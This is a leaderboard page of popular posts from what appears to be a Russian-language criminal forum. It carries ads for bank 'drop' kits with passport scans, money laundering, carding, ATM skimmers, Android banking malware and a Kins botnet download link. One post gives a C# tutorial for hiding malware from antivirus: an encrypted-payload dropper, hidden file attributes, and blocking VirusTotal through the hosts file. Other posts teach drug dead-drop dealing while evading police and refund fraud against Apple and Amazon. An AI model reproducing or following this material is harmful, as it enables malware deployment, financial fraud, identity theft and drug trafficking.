Перейти к публикации

Таблица лидеров


Популярные публикации

Отображаются публикации с наибольшей репутацией на 10.01.2023 во всех областях

  1. 5 баллов

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  2. 3 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  3. 3 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    1000$ - 400$ (моя доля) 2000$ -700$ (моя доля) 3000$ - 900$ (моя доля) 4000$ - 1000$ (моя доля) 5000$ -1200$ (моя доля) https://t.me/wolowmoneytransfer Старая тема с отзывами

    400.00 USD

  4. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Бронирование отелей, авиабилетов, прокат автомобилей 30% Минимальный заказ 200$ 100% успешное пребывание и перелет. Никаких следов незаконной деятельности для вас. Пожалуйста, свяжитесь с нами, если у вас есть какие-либо вопросы telegram @Freetourservice

    200.00 USD

  5. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Продам свой авторский способ работы с сайтом onetwotrip.com Срок обучения 2 дня. После прохождения обучения вы сможете бронировать авиабилеты и гостиницы на чужие банковские карты. Список поставщиков материала в подарок

    799.00 USD

  6. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 20 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    300.00 USD

  7. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  8. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  9. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  10. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  11. 2 балла

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    1000$ - 400$ (моя доля) 2000$ -700$ (моя доля) 3000$ - 900$ (моя доля) 4000$ - 1000$ (моя доля) 5000$ -1200$ (моя доля) https://t.me/wolowmoneytransfer Старая тема с отзывами

    400.00 USD

  12. 2 балла
  13. 1 балл

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 10 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  14. 1 балл

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 20 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    300.00 USD

  15. 1 балл

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  16. 1 балл

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Всегда в наличии, много. цена 12 000 рублей Комплект Карта, сим, Документы, Сканы Паспорта, снилс, ИНН, кодовое слово Есть другие банки. по всем вопросам в телеграм https://t.me/Dropovod

    200.00 USD

  17. 1 балл

    THIS ADVERT HAS EXPIRED!

    • FOR SALE
    • NEW

    Ncr, Wincor Nixdor, Diebold Insert Skimmer.Полный комплект готов к работе. Батарея может работать до 48 часов,наружная температура не влияет на время работы скиммера, так как скиммер находится внутри банкомата.Храните до 15000 дорожек кредитных карт. Полный комплект включает в себя инструменты для вставки и удаления, кабель для передачи данных,компакт-диск с программным обеспечением, это продукт plug and play, который готов к работе. Доступен для заказа PIN-пад в качестве дополнительной опции.

    1,000.00 USD

  18. 1 балл
    Заказ пришел, водила проверил , все четко
  19. 1 балл
    Приветствую тебя, коллега. Я опытный кладмен, который вот уже 2 года ходит по улицам своего города, делая качественные закладки, и остается вне поля зрения у простых граждан, и сотрудников правоохранительных органов. Эта статья больше подойдет уже тем, кто хоть что-то понимает в деле нарко-минера, но новичкам ознакомится тоже не помешает. Я постараюсь рассказать вам свои фишки, о том как быть незамеченным и не бояться своей работы. Итак, начнем. 1. Время работы. Многие пишут что работать необходимо в предобеденное время, примерно с часов 10-11. Да, вероятность доебаться до вас у сотрудников ППС чуть меньше чем в остальной промежуток времени, но тут есть свои интересные нюансы. Представим что на улице понедельник, все учатся, работают, а вы как ни в чем не было ЗИМОЙ шастаете не пойми где, с портфелем и испуганным или задумчивым видом, типа, где бы оставить очередной клад. Это лишнее подозрение, вам оно надо? Не мало моих знакомых были задержаны именно в этот переод времени. Идеальное время работы это 6-7 утра, потому что всем на вас похуй.(у вневедомственной охраны пересменка в это время) Менты хотят спать, так как они либо только проснулись и вышли на смену, либо только со смены, и один хуй хотят спать и спешат домой. Но не каждый минер в это время готов встать и работать, потому у меня временых рамок никогда не было, но я больше предпочитал 14-15:00. Людей не так много, да и идти вы можете уже тупо с учебы,да и никто не подумает что вы без дела шатаетесь. Но в это время надо использовать особый метод работы, о котором я расскажу в 3-ем пункте. 2. Мастер Клад. Многих ловят именно во время подъема МК, и не важно какая тому причина. Я рекомендую во время съема клада, сперва подойти к нему, покопаться, не поднимая его, и пройти метров 50. Если вас не приняли - значит все чисто. Возвращаемся и спокойно без паранойи забираем его. Если же МК пасут, то вас повяжут, но увы, веса они не найдут. Нам это на руку. Что касаемо самого МК, не рекомендую заниматься фасовкой. Так как в случае чего, это лишние пару лет вам в колонии. Да и беготни и палева от этого больше. Как делал я: Покупаем бутылку йогурта или кефира, чтобы бутылка была с широким горлышком, и непрозначная. Дома ее моем, высушиваем. Подбираем МК, например вы в лесу, тамже его открываем и закидываем паки в эту бутылку. Решили сделать закладку - достали пак из бутылки, сделали, и пошли дальше. Вряд ли менты тут же начнут заглядывать в эту бутылку, да и скинуть ее гораздно проще, чем каждый пак из кармана, согласитесь?! Даже можно сказать что тупо нашли эту бутылку, и пусть они ебуться и доказывают что содержимое бутылки Ваше. (пальчиков на паках быть не должно) 3. Собственно наш метод работы невидимки (СТЕЛС) На мой взгляд самый идеальный. Покупаем спичечные коробки, опустошаем их, и ныкаем паки в них. Гуляем себе по городу, ищем тихое и скромное скопление мусора во дворах, сугробах, ну не важно где, главное сделать так чтобы всем было похуй на этот спичечный коробок. Подходя к предполагаемому месту кладу, метров за 5-7 делаем фотографию места, куда вы скинете коробок, ну и собственно кидаем коробок, и снимем координаты. НАПРИМЕР ВЫ ЗАКИНУЛИ КОРОБОК ЗА СУГРОБ БЛИЖЕ К СТЕНЕ У СТОЧНОЙ ТРУБЫ. НА ФОТО УКАЗАЛИ СТРЕЛКОЙ РАСПОЛОЖЕНИЕ КОРОБКА, И В ОПИСАНИИ СООТВЕТСТВЕННО НАПИСАЛИ ЧТО КЛАД В СПИЧЕЧНОМ КОРОБКЕ, ЛЕЖИТ КАК МУСОР(СТЕЛС). ДВОРНИКИ ТУДА НЕ СУЮТСЯ, НЕ ПЕРЕЖИВАЙТЕ. ПРИМЕР НА СКОРУЮ РУКУ, НО ДУМАЮ СУТЬ ЯСНА. МОЖНО ИСПОЛЬЗОВАТЬ ЛЮБУЮ МАСКИРОВКУ ВМЕСТО КОРОБКОВ, НАПРИМЕР, ПАЧКИ СИГАРЕТ, ФАНТИКИ ИЗ ПОД КОНФЕТ. В ОБЩЕМ ПИХАТЬ ВО ВСЕ ТО, ЧТО НЕ СТАНЕТ ПОДБИРАТЬ НИКТО. (ПАЧКУ СИГАРЕТ ЛУЧШЕ СМЯТЬ, ДЕБИЛОВ ХВАТАЕТ) Все, ваш клад готов. Вы потратили на это всего 30 секунд, и даже не остановились. Но тут должна работать голова, чтобы понимать куда надежнее скинуть этот коробок. Ненаходов у меня практически таким методом еще не было. Да и этим способом можно работать в абсолютно любое время суток. Удачи тебе друг! И знай, главное не юзай ничего во время работы и старайся делать все на ходу, без остановок, и тогда ты не будешь пойман!
  20. 1 балл
    Продам андроид малварь CC grabber - инжект в google play Socks Bot Доступ к смс Перехват звонков перехват онлайн трафика Возможно доработки по вашим критериям Цена : 700$ Обращаться в ПМ ЛС
  21. 1 балл
  22. 1 балл
    Сегодня поговорим о методах защиты файла от попадания на Virus Total и в руки к другим антивирусов. Для начала давайте развеем миф о том, что лоадер спасает от слива на вт. Поверьте люди которые работают в команде вт и других антивирусов не так глупы , если им в руки попадет лоадер они полюбому его запустят ,увидят что он подкачивает какие-то файлы и тоже их проанализируют. По сути мы можем разделить нашу защиту от слива на два этапа : 1) до установки малваре на пк жертвы ; 2) после установки малваре на пк жертвы ; Приступим к первому варианту. Здесь я увидел 2 метода : 1) Первый и наиболее по моему мнению юзабельний это разделить ваш вирус на два файла например, на dll и exe . Это не должно быть только проверка на наличие длл'кы, в ней должно быть скрытая часть вируса. Например, в dllесть зашифрованные байты самого вируса, а exe их расшифровывает и запускает. Жертва не сможет слить на вт два файла сразу, а один без другого работать не будет. Шанс что ав соберут два файла вместе и запустят их действительно мизерный. Ниже пример реализаци на c#,для шифрования будем использовать метод sha256 : Сам exe файлик Код: using System; using System.IO; using System.Security.Cryptography; using System.Text; namespace ExePart { class Program { static string password = "shopozanyanime"; static void Main(string[] args) { if (File.Exists("file.dll")) { byte[] decrypted = decrypt(File.ReadAllBytes("file.dll")); File.WriteAllBytes(Path.GetTempPath() + "\\nachvt.exe",decrypted); } } public static byte[] decrypt(byte[] cipherBytes) { byte[] plainBytes; Aes encryptor = Aes.Create(); encryptor.Mode = CipherMode.CBC; SHA256 mySHA256 = SHA256Managed.Create(); encryptor.Key = mySHA256.ComputeHash(Encoding.ASCII.GetBytes(password)); encryptor.IV = new byte[16] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 }; MemoryStream memoryStream = new MemoryStream(); ICryptoTransform aesDecryptor = encryptor.CreateDecryptor(); CryptoStream cryptoStream = new CryptoStream(memoryStream, aesDecryptor, CryptoStreamMode.Write); string plainText = String.Empty; try { cryptoStream.Write(cipherBytes, 0, cipherBytes.Length); cryptoStream.FlushFinalBlock(); plainBytes = memoryStream.ToArray(); } finally { memoryStream.Close(); cryptoStream.Close(); } return plainBytes; } } } DllCreator Код: using System.IO; using System.Security.Cryptography; using System.Text; namespace DllCreator { class Program { static string password = "shopozanyanime"; static void Main(string[] args) { byte[] start = File.ReadAllBytes("in.exe"); byte[] encrypted = encrypt(start); File.WriteAllBytes("file.dll", encrypted); } public static byte[] encrypt(byte[] plainBytes) { Aes encryptor = Aes.Create(); encryptor.Mode = CipherMode.CBC; SHA256 mySHA256 = SHA256Managed.Create(); encryptor.Key = mySHA256.ComputeHash(Encoding.ASCII.GetBytes(password)); encryptor.IV = new byte[16] { 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0 }; MemoryStream memoryStream = new MemoryStream(); ICryptoTransform aesEncryptor = encryptor.CreateEncryptor(); CryptoStream cryptoStream = new CryptoStream(memoryStream, aesEncryptor, CryptoStreamMode.Write); cryptoStream.Write(plainBytes, 0, plainBytes.Length); cryptoStream.FlushFinalBlock(); byte[] cipherBytes = memoryStream.ToArray(); memoryStream.Close(); cryptoStream.Close(); return cipherBytes; } } } Да да да знаю можно было сделать лучше, копировать два файла в какую-то папку и использовать loadpe тогда все вообще будет круто,но я только показываю вам идею, даю вам пространство для размышлений по ее улучшению 2) Как мы знаем вт сканирует файлы до 256 мб . То есть нам нужно увеличить размер нашего вируса одним из способов. Например через Hex Editor. Открываем нашу программу в Hex Editor Идем в сам низ, где заканчиваются байти Нажимаем Edit - > Insert bytes -> ставим много 999999 Сохраняем . Как мы видим размер увеличился - программа работает Здесь заканчивается первый этап. Он больше подходит для людей вручную распространяют файлы. Теперь поговорим о методах защиты после установки малваре на пк жертвы : 1) Элементарно использовать атрибуты hidden и system (именно и и , а не или или) Код: string path = @"C:\miner.exe"; File.SetAttributes(path , FileAttributes.System | FileAttributes.Hidden) 2) Можно просто заблокировать сайт вт и других антивирусов следующем кодом Код: String path =@"C:\Windows\System32\drivers\etc\hosts"; StreamWriter sw = new StreamWriter(path, true); String sitetoblock = "\n 127.0.0.1 virustotal.com"; sw.Write(sitetoblock); sw.Close(); Минус в том, что могут понадобиться админ права. 3) Если файл будет существовать только в оперативной и не будет имеить физической основы на диске его не будет возможно слить на вт. Единственный минус файл будет работать только до перезагрузки пк.
  23. 1 балл
    Ограничения рассылки Макс. постов в сутки на стены пользователей – 40 постов Макс. постов в сутки на стены сообществ – 100 постов Макс. комментариев в сутки к постам/фото/видео – 100 комментариев * При достижении хотя бы одного лимита из трех выше перечисленных, аккаунт получает лимит и на постинг и на комментирование. Макс. сообщений недрузьям – 20 сообщений в 12 часов Макс. сообщений друзьям - 300 сообщений в 12 часов Макс. заявок в друзья – 101 заявка в 12 часов Макс. публикаций в администрируемое сообщество (от имени сообщества) в сутки — 50 постов Макс. количество отметок «Мне нравится» – 500 в 12 часов Далее рассмотрим общие ограничения ВКонтакте. Мои Аудиозаписи Аудиозаписей на странице (корректное отображение) – 6 000 аудиозаписей Макс. аудиозаписей можно загрузить на страницу в сутки – 50 аудиозаписей Макс. длительность аудиозаписи – 24 часа Макс. кол-во аудиозаписей в альбоме – 1 000 аудиозаписей Макс. кол-во Моих Аудиозаписей – 32 767 аудиозаписей Макс. размер аудиозаписи – 200 Мб Мин. длительность аудиозаписи – 5 секунд Мои Видеозаписи Макс. видеозаписей на странице – 5 000 видеозаписей Макс. комментариев к видеозаписи – 4 096 комментариев Макс. размер видеозаписи – 2 Гб Мои Группы Макс. длина названия сообщества – 48 знаков Макс. количество альбомов в группе, при котором появляется ссылка «Обзор фотографий» – 20 Макс. количество друзей, которых можно пригласить в группу за сутки – 40 Макс. количество мест (отметок на карте) в сообществе – 50 отметок Макс. количество подписчиков для удаления паблика – 100 подписчиков Макс. количество сообществ, в которые можно вступить (подписаться) – 5 000 сообществ Макс. количество контактов в группе — 30 контактов Максимальная длина wiki-страницы – 16 294 знака Максимальное количество администраторов в сообществе – 155 как минимум (для точной проверки пока не хватает ресурсов) Максимальное количество видеозаписей в группе – 10 000 видеозаписей Максимальное количество ссылок в сообществе – 100 ссылок Максимальное количество отложенных постов — 25 в сутки/150 всего Мои Друзья(у тебя их нет) Количество друзей и подписок, которые можно скрыть – 30 друзей Макс. друзей вместе с отправленными заявками – 10 000 друзей Макс. количество друзей, чтобы ссылка с логотипа вела на свою страницу, а не на новости – 5 друзей (включая отправленные заявки) Макс. количество приватных списков друзей – 24 списка Мин. количество друзей или сообществ, чтобы в рекламном блоке перестали отображаться возможные друзья – 100 друзей Мин. количество друзей или сообществ, чтобы исчезли предложения интересных людей и сообществ – 25 Мин. количество друзей, чтобы появилась кнопка Дни Рождения, ведущая в Календарь – 10 друзей Мин. количество подписчиков для отображения в Интересных страницах – 1 000 подписчиков Мои Закладки Макс. число людей в закладках – 500 пользователей В разделе Фотографии отображаются только последние – 1 000 фотографий Мои Новости Количество подписчиков для появления ссылки Статистика в “Ответах” – от 50 подписчиков Макс. количество людей и сообществ, которых можно скрыть в фильтре «Редактировать» в Новостях – 1 000 Срок хранения в Мои Новости Новостей и Комментариев – 10 дней Мои Сообщения Макс. вложений в ЛС – 10 вложений Макс. длина сообщения – 4 096 знака Макс. длина сообщения к подарку – 250 знаков Макс. количество собеседников в диалогах – 30 собеседников Ограничение «Все кроме» в «Кто может писать мне личные сообщения» вступает в силу через 7 суток Мои Фотографии За раз можно загрузить – не более 200 фотографий Макс. «вес» загружаемой фотографии – 5 МБ Макс. длина описания фотографии – 255 символов Макс. количество альбомов на странице, при котором появляется ссылка «Обзор фотографий» – 70 Макс. комментариев к фотографии – 2 048 комментариев Макс. отметок на фотографии – 35 человек Макс. размер главной фотографии профиля – 200х500 пикселей Макс. размер главной фотографии профиля (грузится без сжатия) – 2560х2048 пикселей Макс. размер фотографии после сжатия – 1280х1024 пикселей Макс. сумма длины и ширины фотографии – 10 000 пикселей Макс. фотографий в альбоме «Фотографии со стены» – 32 767 фотографий Макс. фотографий в одном альбоме – 5 000 фотографий Мин. размер главной фотографии профиля – 200х200 пикселей Предел пропорции главной фотографии профиля (с компьютера не установится, но установится из альбома с невозможностью отмечать миниатюру, – ошибка 4 в обоих случаях) – 2:1 Пропорции сторон фотографии – 1:20 Размер аватара группы (разрешение 72 пикс/дюйм) – 200х500 пикселей Моя Страница Длина пароля – 6—32 символа Количество минут, которые пользователь будет висеть «онлайн» после выхода – 15 минут Макс. братьев и сестер, которых можно добавить в профиль – 15 братьев и сестер Макс. детей, которых можно добавить в профиль – 15 детей Макс. длина статуса – 140 знаков Макс. количество отметок «Мне нравится» в сутки – 500 Макс. количество символов в «любимых цитатах» – 3 864 с учётом пробелов Макс. указанных мест на странице – 30 мест Макс. число мест работы – 7 мест Мин. длина короткого имени – 5 знаков После регистрации реклама начинает показываться пользователю через 3 месяца Сообщения в тех. поддержку Мин. интервал между вопросами — 1 час. Частота сообщений от заблокированных и троллей – 1 вопрос, 3 комментария — в неделю Частота сообщений от нормальных пользователей – 3 комментария в час, 10 комментариев в день, 9 вопросов в неделю. Частота сообщений от нормальных пользователей: Для вопросов: 1 в час, 1 в день, 3 в неделю. Для комментариев: 2 в час, 7 в сутки. Стена Количество часов, в течение которых можно редактировать запись на стене – 24 Макс. вариантов ответа в опросе 10 для личных страниц, 10 для сообществ Макс. вложений в запись на стене – 200 вложений Макс. размер заметки – 15 895 знаков
  24. 1 балл
    Использующие приемы социальной инженерии киберпреступники за последние годы взяли на вооружение более продвинутые методы, которые позволяют с большей долей вероятности получить доступ к нужной информации, используя современную психологию сотрудников предприятий, да и людей в целом. Первым шагом в противостоянии такого вида уловкам является понимание самих тактик злоумышленников. Рассмотрим восемь основных подходов к социальной инженерии. В 90-е понятие «социальная инженерия» ввел в употребление Кевин Митник, знаковая фигура в сфере информационной безопасности, бывший хакер серьезного уровня. Однако злоумышленники использовали такие методы задолго до появления самого термина. Специалисты убеждены, что тактика современных киберпреступников завязана на преследовании двух целей: кража паролей, установка вредоносной программы. Злоумышленники пытаются применить социальную инженерию, используя телефон, электронную почту и Сеть. Ознакомимся с основными методами, помогающими преступникам добывать необходимую им конфиденциальную информацию. Тактика 1 Теория десяти рукопожатий. Главная цель злоумышленника, использующего телефон для социальной инженерии, состоит в том, чтобы убедить свою жертву в одном из двух моментов: Жертве звонит сотрудник компании; Звонит представитель уполномоченного органа (например, правоохранитель или аудитор). Если преступник ставит себе задачу собрать данные об определенном сотруднике, он может сначала связаться с его коллегами, пытаясь всяческими способами выудить нужные ему данные. Припоминаете старую теорию шести рукопожатий? Так вот, специалисты в области безопасности утверждают, что между киберпреступником и его жертвой может быть всего десять «рукопожатий». Эксперты полагают, что современных условиях всегда нужно иметь небольшую паранойю, так как неизвестно, чего от вас хочет тот или иной сотрудник. Злоумышленники обычно выходят на секретаря (или занимающего похожую должность человека), чтобы собрать информацию о людях, стоящих выше по иерархии. Специалисты отмечают, что дружелюбный тон во многом помогает мошенникам. Медленно, но верно преступники подбирают к вам ключ, что вскоре приводит к тому, что вы делитесь информацией, которую бы раньше ни за что не открыли. Тактика 2 Изучение корпоративного языка. Как известно, у каждой отрасли есть свои специфические формулировки. Задача злоумышленника, пытающегося добыть необходимую информацию, — изучить особенности такого языка, чтобы более искусно использовать приемы социальной инженерии. Вся специфика кроется в изучении корпоративного языка, его терминов и особенностей. Если киберпреступник будет говорить на знакомом, привычном и понятном для его целей языке, он легче войдет в доверие и сможет быстрее заполучить необходимую ему информацию. Тактика 3 Заимствование музыки для ожидания во время звонков. Для осуществления успешной атаки мошенники нуждаются в трех составляющих: время, настойчивость и терпение. Зачастую кибератаки с использованием социальной инженерии производятся медленно и методично — собираются не только данные о нужных людях, но и так называемые «социальные сигналы». Это делается для того, чтобы заполучить доверие и обвести цель вокруг пальца. Например, злоумышленники могут убедить ту персону, с которой они общаются, в том, что они коллеги. Одной из особенностей такого подхода является запись музыки, которую компания использует во время звонков, в момент, когда звонящий ожидает ответа. Преступник сначала дожидается такой музыки, затем записывает ее, после чего использует в своих интересах. Таким образом, когда идет непосредственный диалог с жертвой, злоумышленники в какой-то момент говорят: «Подождите минутку, звонок по другой линии». Затем жертва слышит знакомую музыку и у нее не остается никаких сомнений, что звонящий представляет определенную компанию. В сущности, это лишь грамотный психологический трюк. Тактика 4 Спуфинг (подмена) телефонного номера. Преступники часто используют спуфинг телефонных номеров, что помогает им подменить номер звонящего абонента. Например, злоумышленник может сидеть у себя в квартире и звонить интересующему его лицу, однако на определителе номера отобразится принадлежащий компании номер, что создаст иллюзию того, что мошенник звонит, используя корпоративный номер. Разумеется, ничего не подозревающие сотрудники в большинстве случаев передадут конфиденциальную информацию, включая пароли, звонящему лицу, если идентификатор абонента принадлежит их компании. Такой подход также помогает преступникам избежать отслеживания, так как если перезвонить на этот номер, вы будете переадресованы на внутреннюю линию компании. Тактика 5 Использование новостей против вас. Какими бы ни были заголовки текущих новостей, злоумышленники используют эту информацию в качестве приманки для спама, фишинга и других мошеннических действий. Не зря специалисты в последнее время отмечают рост числа спам-писем, темы которых касаются президентских кампаний и экономических кризисов. Из примеров можно привести фишинговую атаку на какой-либо банк. В электронном письме говорится примерно следующее: «Другой банк [имя банка] приобретает ваш банк [имя банка]. Нажмите на эту ссылку, чтобы убедиться, что информация о вашем банке обновлена, пока сделка не закрыта». Естественно, это попытка заполучить информацию, с помощью которой мошенники смогут войти в ваш аккаунт, украсть ваши деньги, либо продать вашу информацию третьему лицу. Тактика 6 Использование доверия к социальным платформам. Ни для кого не секрет, что сайты Facebook, Myspace и LinkedIn представляют собой чрезвычайно популярные социальные сети. Согласно исследованию экспертов, люди склонны доверять таким платформам. Таким образом, многие пользователи будут доверять электронному письму, если в нем будет утверждаться, что оно пришло от Facebook. Частым приемом является утверждение, что соцсеть проводит техническое обслуживание, вам надо «нажать здесь», чтобы обновить информацию. Именно поэтому специалисты рекомендуют сотрудникам предприятий вводить веб-адреса вручную, чтобы избежать фишинговых ссылок. Также стоит иметь в виду, что сайты в очень редких случаях направляют пользователям запрос на изменение пароля или обновление учетной записи. Тактика 7 Тайпсквоттинг. Эта вредоносная техника примечательна тем, что злоумышленники используют человеческий фактор, а именно ошибки при введении URL-адреса в адресную строку. Таким образом, ошибившись всего на одну букву, пользователь может попасть на сайт, созданный специально для этих целей злоумышленниками. Киберпреступники тщательно подготавливают почву для тайпсквоттинга, следовательно, их сайт будет как две капли воды похож на тот легитимный, который вы хотели первоначально посетить. Таким образом, допустив ошибку в написании веб-адреса, вы попадаете на копию легитимного сайта, целью которого является либо продажа чего-либо, либо кража данных, либо распространение вредоносных программ. Тактика 8 Использование FUD для воздействия на ранок ценных бумаг. FUD — тактика психологической манипуляции, применяемая в маркетинге и пропаганде вообще, заключающаяся в подаче сведений о чем-либо (в частности, продукте или организации) таким образом, чтобы посеять у аудитории неуверенность и сомнение в его качествах и таким образом вызвать страх перед ним. Согласно последним исследованиям Avert, безопасность и уязвимость продуктов и даже целых компаний может повлиять на рынок акций. Например, исследователи изучили влияние таких событий, как «Вторник патчей от Microsoft» (Microsoft Patch Tuesday) на акции компании, обнаружив заметное колебание каждый месяц после того, как публикуется информация об уязвимостях. Также можно вспомнить, как злоумышленники в 2008 году распространили ложную информацию о здоровье Стива Джобса, что повлекло за собой резкое падение акций компании Apple. Это самый характерный пример использования FUD в злонамеренных целях. Помимо этого, стоит отметить использование электронной почты для реализации техники «pump-and-dump» (схема манипуляций биржевым курсом на фондовом рынке или на рынке криптовалют с последующим обвалом). В этом случае злоумышленники могут разослать электронные письма, описывающие потрясающий потенциал акций, которые они заранее скупили. Таким образом, многие будут стараться скупить эти акции как можно скорее, а они будут увеличиваться в цене. Выводы Зачастую киберпреступники крайне изобретательны в своем использовании социальной инженерии. Ознакомившись с их методами, можно сделать вывод, что различные психологические трюки очень помогают злоумышленникам добиваться поставленных целей. Исходя их этого, стоит обращать внимание на любую мелочь, которая может невольно выдать мошенника, проверять и перепроверять информацию о связывающихся с вами людях, особенно если обсуждается конфиденциальная информация.
  25. 1 балл
    Рефанд (англ. refund) - добровольный возврат торговой точкой покупателю платежа, произведенного им ранее по карте в счет покупки. Осуществляется по просьбе покупателя. Если объяснять простым языком, то вы заказываете товар в интернет магазине, ждете момента его получения. Желательно обращаться к специалисту по возврату средств, чем пытаться сделать это лично, иначе шанс что вам вернут деньги очень мал. За работу они берут не больше 15% от суммы, после успешного возврата средств. Что бы глупых вопросов не возникало сразу говорю: Да, сначала вы оплачиваете все покупки со своего кармана, но при грамотном подходе они вернутся к вам на карту в течение недели! Придерживайтесь моих советов, и все пройдет гладко. Самые актуальные магазины на мой взгляд, которые проходят на УРА на момент написания статьи: Apple.com - до 5000$. Условия по оф. сайту Apple - адреса посреднических компаний для заказа не подойдут. Ни при каких обстоятельствах. Только кристально чистые Американские/Канадские адреса. Никуда кроме Америки и Канады не отправляют. Строго одна вещь в заказе. Строго до 5000$. Макбуки, Айфоны, Аймаки и остальные прелести жизни. Стафф не вскрывается и, разумеется, не включается до получения возврата. Расписываться за получение посылки можно, но не ставить Pre-Sign (кнопка в письме от Apple на почту об успешной отправке вашего девайса)! Магазины одежды: ASOS.com - до 50000₽ Victoriassecret.com - до 500$ Abercrombie.com - до 400$ С них можно смело отправлять в РУ на свой адрес, друга, подруги и т.п. Главное не бейте одни и те же адреса больше 1 посылки. Ну и самое ходовое в этом деле, это конечно же Амазон, на данный момент лучше всех проходит Франция и Италия: Во франции (amazon.fr) подходящие для возврата товары выглядят так: Expédié et vendu par Amazon. - подходит Vendu par (название магазина) et expédié par Amazon. - подходит Expédié et vendu par (название магазина). - не подходит В Италии (amazon.it) подходящие для возврата товары выглядят вот так: Venduto e spedito da Amazon. - подходит Venduto da (название магазина) e spedito da Amazon. - подходит Venduto e spedito da (название магазина). - не подходит Дабы облегчить поиск товаров, подходящих для возврата, после ввода интересующего названия в строку поиска в амазоне, в менюшке слева нажимаем на голубую иконку с желтой галочкой - Prime На amazon.fr она пишется немного иначе - Premium В этом случае, в результатах поиска должно сократиться количество товаров, и останутся преимущественно только те, что подходят для возврата Так же советую поставить выбор по марке производителя, например, если ищем айфон - ставим бренд Apple. Для того, чтобы в результаты поиска не лезли всякие чехлы, шнурки и остальные ненужные аксессуары Теперь хочу поделиться своим мнением, какие нюансы нужно учесть при оформлении вашего заказа на амазоне, которые должны уменьшить вероятность холда! Заходим на сайт амазона, щелкаем товары. Спустя минут 20-30, регистрируемся (вводим имейл, имя на аккаунте, и дважды повторяем пароль). Оставляем аккаунт на некоторое время в покое, затем возвращаемся на амазон и продолжаем активность! Перед вашим возвращением, не забудьте еще раз залогиниться в аккаунт, если вас из него выбило. Добавляем что-то в корзину, создаём виш-лист (список желаний) и добавляем товары в него. Откладываем товары из корзины на потом. Вообщем, создаем видимость активного поиска и выбора товара. Если аккаунт регистрировали, к примеру утром, вечером вводим адрес доставки в настройках аккаунта. Если регистрировали вечером, вводим адрес доставки на след. день Вообщем, поддерживать эту активность я бы посоветовал в течение пары дней. Обязательно всегда следите за тем, что вы находитесь в аккаунте. Проверить это можно путем перехода в аккаунт, и, например, в графу изменения адреса или проверки гифт-баланса. При таких перемещениях всегда попросит повторно залогиниться в систему, если вы не залогинены После грамотного прогрева аккаунта в течение 2-3 дней описанными выше методами, в конце-концов убираем из корзины все ненужное, и приступаем к оформлению товара! Всегда выбирайте экспресс доставку, чем быстрее товар доберется до вас или посредника, тем быстрее вы вернете свои деньги! Всем удачных покупок!
  26. 1 балл
  27. 1 балл
    Заказал 2 карты для начала, как придут отпишусь.
  28. 1 балл
    Бро за грубый метод сесть больше шансов
  29. 1 балл
  30. 1 балл
    Заказал своей малышке аудио систему , катаюсь не обламываюсь теперь P.S для машины купил сабвуфер, 2 уселителя , конденсатор и 6 динамиков Пришло все как и обещал ТС , курьер принес прям домой ))
  31. 1 балл
    Спасибо за сделку! Отныне покупаю только через тебя
  32. 1 балл
    Делаю раздачку ботнета Kins2 Его возможности: -Grabs Firefox Latest -Grabs Chrone Latest - Grabs IE Latest -Grab POP3/OutLook Logins, Grabs FTP, Shell Logins -Backconnect Module -VNC Module -Anti-Rapport -Anti-tracker https://www.sendspace.com/file/v0aiij
  33. 1 балл
